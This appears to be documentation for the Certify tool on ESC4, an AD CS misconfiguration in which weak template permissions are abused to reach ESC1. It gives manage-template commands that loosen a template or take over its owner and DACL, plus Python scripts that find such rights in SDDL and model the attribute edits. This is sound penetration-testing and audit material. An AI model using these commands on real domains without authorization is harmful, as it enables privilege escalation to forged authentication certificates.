ESC4 is a misconfiguration in Active Directory Certificate Services (AD CS) that stems from overly permissive access controls on certificate template domain objects. If a principal has the privileges to control the attributes of a certificate template object, they can edit the template until it matches the abuse criteria of another escalation technique (this page walks through ESC1) and then carry out that technique's abuse scenario.
Any of the following rights, when delegated to an arbitrary principal, constitute an ESC4 vulnerability:

Right           Description
Owner           The principal owns the object. An owner can always read and rewrite the object's DACL, so ownership amounts to full control.
Full Control    The principal has full control (GenericAll) of the object and can edit any property.
Write Property  The principal has write access to the object's properties (GenericWrite, or WriteProperty on the whole object) and can edit any property.
Write Owner     The principal can change the owner of the object.
Write Dacl      The principal can modify the access controls (DACL) of the object.
We can search for certificate templates with misconfigured access controls using the enum-templates --filter-vulnerable command from Certify. For more information about the command and its parameters, please refer to the Command Overview page.
Certify.exe enum-templates --filter-enabled --filter-vulnerable --hide-admins
As seen in the Object Control Permissions section, arbitrary principals can have delegated rights on certificate template objects. The abuse scenario varies with the delegated permission, but the overall idea is the same: modify the template so it satisfies another escalation technique, then carry out that technique's abuse scenario. Every change is written to the template object in the Configuration partition, so it replicates to every domain controller in the forest and is visible to defenders; record the original attribute values before editing so they can be restored afterwards.
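As an added example (not part of the Certify project or of this page), the following Python script performs the same triage offline against a template's security descriptor exported as SDDL. It assumes the SDDL was dumped beforehand, for instance the Sddl property of the object returned by PowerShell's Get-Acl on the template's AD: path (an assumption about how the descriptor was obtained; any SDDL export works). The SIDs, the domain in them and the attribute GUID in the sample are constructed. The script reports the rights from the table above per principal, hides the built-in admin aliases the way --hide-admins does, and labels a WriteProperty ACE that an object GUID scopes to a single attribute separately from whole-object write, since the two are not the same thing and the scoped case needs manual review.

```python
import re

# ADS_RIGHT_* bits, used when an ACE's rights field is a hex mask rather than tokens.
DS_WRITE_PROP = 0x20
WRITE_DAC = 0x40000
WRITE_OWNER = 0x80000
GENERIC_ALL = 0x10000000
GENERIC_WRITE = 0x40000000

# Two-character SDDL right tokens that add up to an ESC4 finding. GenericWrite is
# reported under its own name; it implies write access to every property.
TOKEN_RIGHTS = {
    "GA": "Full Control",
    "GW": "Generic Write",
    "WP": "Write Property",
    "WD": "Write Dacl",
    "WO": "Write Owner",
}

# SDDL aliases for principals expected to control templates (Domain Admins,
# Enterprise Admins, Builtin Administrators, SYSTEM): the --hide-admins idea.
ADMIN_ALIASES = {"DA", "EA", "BA", "SY"}

SID = r"(?:S-1-[0-9-]+|[A-Z]{2})"
OWNER_RE = re.compile(r"O:(" + SID + r")")
# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
ACE_RE = re.compile(r"\(([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*);(" + SID + r")\)")


def rights_in_field(field):
    """Return the ESC4-relevant right names granted by one ACE rights field."""
    found = set()
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        if mask & GENERIC_ALL:
            found.add("Full Control")
        if mask & GENERIC_WRITE:
            found.add("Generic Write")
        if mask & DS_WRITE_PROP:
            found.add("Write Property")
        if mask & WRITE_DAC:
            found.add("Write Dacl")
        if mask & WRITE_OWNER:
            found.add("Write Owner")
        return found
    for i in range(0, len(field) - 1, 2):
        name = TOKEN_RIGHTS.get(field[i:i + 2])
        if name:
            found.add(name)
    return found


def esc4_findings(sddl, hide_admins=True):
    """Map each principal to the ESC4 rights it holds on the template.

    Only allow ACEs are evaluated; deny ACEs are ignored, so the result can
    over-report, which is the right direction for triage.
    """
    findings = {}
    owner = OWNER_RE.search(sddl)
    if owner and not (hide_admins and owner.group(1) in ADMIN_ALIASES):
        findings.setdefault(owner.group(1), set()).add("Owner")
    for ace_type, _flags, rights, obj_guid, _inh, sid in ACE_RE.findall(sddl):
        if ace_type not in ("A", "OA") or (hide_admins and sid in ADMIN_ALIASES):
            continue
        granted = rights_in_field(rights)
        if obj_guid:
            # An object GUID narrows WriteProperty to one attribute or property
            # set. That is not whole-object write, so label it for manual review.
            granted = {
                f"{r} (scoped to {obj_guid})" if r == "Write Property" else r
                for r in granted
            }
        if granted:
            findings.setdefault(sid, set()).update(granted)
    return findings


# Constructed SDDL for a template named CustomInsecure: a low-privileged user
# (RID 1105) owns it, another (RID 1106) holds WP/WD/WO, Domain Users hold a
# single-attribute WP (hypothetical GUID), and the admin groups are as usual.
SAMPLE_SDDL = (
    "O:S-1-5-21-1111-2222-3333-1105G:DAD:PAI"
    "(A;;GA;;;DA)(A;;GA;;;EA)(A;;0x000f01ff;;;BA)(A;;LCRPRC;;;AU)"
    "(A;;WPWDWO;;;S-1-5-21-1111-2222-3333-1106)"
    "(OA;;WP;11111111-2222-3333-4444-555555555555;;DU)"
)

if __name__ == "__main__":
    for principal, rights in sorted(esc4_findings(SAMPLE_SDDL).items()):
        print(f"{principal}: {', '.join(sorted(rights))}")
```

Run it with hide_admins=False to see the admin groups as well; Authenticated Users (AU) holding only LC/RP/RC (list, read property, read control) is the normal baseline and is not reported.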

Full Control / Write Property

If a principal has Full Control or Write Property rights, they can edit any property on the certificate template domain object, which makes it straightforward to establish the conditions of the desired abuse scenario.
We need to perform the following steps to modify the certificate template to allow the ESC1 abuse scenario:
  • Ensure that our principal has enrollment rights. This can be granted/revoked using the following Certify command:
    • Certify.exe manage-template --template <template> --enroll <sid>
  • Ensure that manager approval is disabled. This can be toggled on/off using the following Certify command:
    • Certify.exe manage-template --template <template> --manager-approval
  • Ensure that authorized signatures are disabled. This can be set using the following Certify command:
    • Certify.exe manage-template --template <template> --authorized-signatures 0
  • Ensure that the template supports client authentication. This can be toggled on/off using the following Certify command:
    • Certify.exe manage-template --template <template> --client-auth --pkinit-auth --smartcard-logon
  • Ensure that the enrollees can supply subject details. This can be toggled on/off using the following Certify command:
    • Certify.exe manage-template --template <template> --supply-subject
For more information about the manage-template command and its parameters, please refer to the Command Overview page. After making the changes, re-run the enumeration to confirm that the template is now reported with the ESC1 criteria met:
Certify.exe enum-templates --filter-enabled --filter-vulnerable --hide-admins
Once the template fits the abuse criteria for ESC1, it is possible to carry out the respective abuse scenario.
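The five steps above as one worked example, added here and not part of the Certify project: the script models the template attributes those manage-template switches write (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage), reports which ESC1 conditions a given SID still fails, applies the same edits, and diffs before and after so the original values can be restored later. The template values and the domain SID are constructed; enrollment rights are represented as an already-extracted set of SIDs holding the Certificate-Enrollment extended right rather than parsed from the DACL.

```python
# Attribute bits and OIDs in which the ESC1 conditions are expressed.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: manager approval
CT_FLAG_AUTO_ENROLLMENT = 0x00000020            # msPKI-Enrollment-Flag: unrelated, must survive the edit

EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_PKINIT_CLIENT = "1.3.6.1.5.2.3.4"
EKU_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
EKU_ANY_PURPOSE = "2.5.29.37.0"
EKU_SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_PKINIT_CLIENT, EKU_SMARTCARD_LOGON, EKU_ANY_PURPOSE}


def allows_authentication(ekus):
    """An empty pKIExtendedKeyUsage means 'any purpose', which also authenticates."""
    return not ekus or bool(set(ekus) & AUTH_EKUS)


def esc1_blockers(template, sid):
    """List the conditions that still stop `sid` from abusing `template` via ESC1.

    `template["enroll"]` is the set of SIDs holding the Certificate-Enrollment
    extended right, assumed to have been extracted from the DACL beforehand.
    """
    blockers = []
    if sid not in template["enroll"]:
        blockers.append("no enrollment right")
    if template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        blockers.append("manager approval required")
    if template["msPKI-RA-Signature"] > 0:
        blockers.append(f"{template['msPKI-RA-Signature']} authorized signature(s) required")
    if not allows_authentication(template["pKIExtendedKeyUsage"]):
        blockers.append("no authentication EKU")
    if not template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        blockers.append("enrollee cannot supply subject")
    return blockers


def esc4_to_esc1(template, sid):
    """Return a copy of `template` with the edits the five steps above make."""
    t = dict(template)
    t["enroll"] = set(template["enroll"]) | {sid}                   # --enroll <sid>
    t["msPKI-Enrollment-Flag"] &= ~CT_FLAG_PEND_ALL_REQUESTS         # --manager-approval (off)
    t["msPKI-RA-Signature"] = 0                                      # --authorized-signatures 0
    t["pKIExtendedKeyUsage"] = sorted(                               # --client-auth --pkinit-auth --smartcard-logon
        set(template["pKIExtendedKeyUsage"])
        | {EKU_CLIENT_AUTH, EKU_PKINIT_CLIENT, EKU_SMARTCARD_LOGON}
    )
    t["msPKI-Certificate-Name-Flag"] |= CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT  # --supply-subject
    return t


def changed_attributes(before, after):
    """The attributes that differ: what to revert, and what shows up in the audit trail."""
    return {k: (before[k], after[k]) for k in before if before[k] != after[k]}


# Constructed "hardened" template: admin-only enrollment, manager approval plus one
# RA signature, server-auth EKU only, subject built from AD. The domain SID is made up.
HARDENED = {
    "enroll": {"S-1-5-21-1111-2222-3333-512"},
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS | CT_FLAG_AUTO_ENROLLMENT,
    "msPKI-RA-Signature": 1,
    "pKIExtendedKeyUsage": [EKU_SERVER_AUTH],
    "msPKI-Certificate-Name-Flag": 0x82000000,  # subject from directory path + UPN, supply-subject clear
}
ATTACKER = "S-1-5-11"  # Authenticated Users, as in the examples on this page

if __name__ == "__main__":
    print("before:", esc1_blockers(HARDENED, ATTACKER))
    after = esc4_to_esc1(HARDENED, ATTACKER)
    print("after: ", esc1_blockers(after, ATTACKER) or "ESC1 conditions met")
    for attr, (old, new) in changed_attributes(HARDENED, after).items():
        print(f"  {attr}: {old!r} -> {new!r}")
```

The diff returned by changed_attributes is exactly the set of attribute writes a defender will see on the template object, and the "before" side is what you hand back when cleaning up.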

Owner / Write Dacl

If a principal has Owner or Write Dacl rights, they can modify the access controls (DACL) of the certificate template domain object. This can be leveraged to grant a principal the Write Property right using the following Certify command. Note that S-1-5-11 in the example below is Authenticated Users, which opens the template to every authenticated principal in the forest; granting the right to the SID of the principal you control keeps the change narrower.
  • Certify.exe manage-template --template <template> --write-property <sid>
Certify.exe manage-template --template CustomInsecure --write-property S-1-5-11
Now that we have obtained Write Property rights, we can circle back to Full Control / Write Property.

Write Owner

If a principal has Write Owner rights, they can change the owner of the certificate template domain object. Setting the owner to a principal under our control gives that principal the Owner right (and with it the implicit ability to rewrite the DACL) using the following Certify command:
  • Certify.exe manage-template --template <template> --owner <sid>
Certify.exe manage-template --template CustomInsecure --owner S-1-5-11
Now that we have obtained Owner rights, we can circle back to Owner / Write Dacl.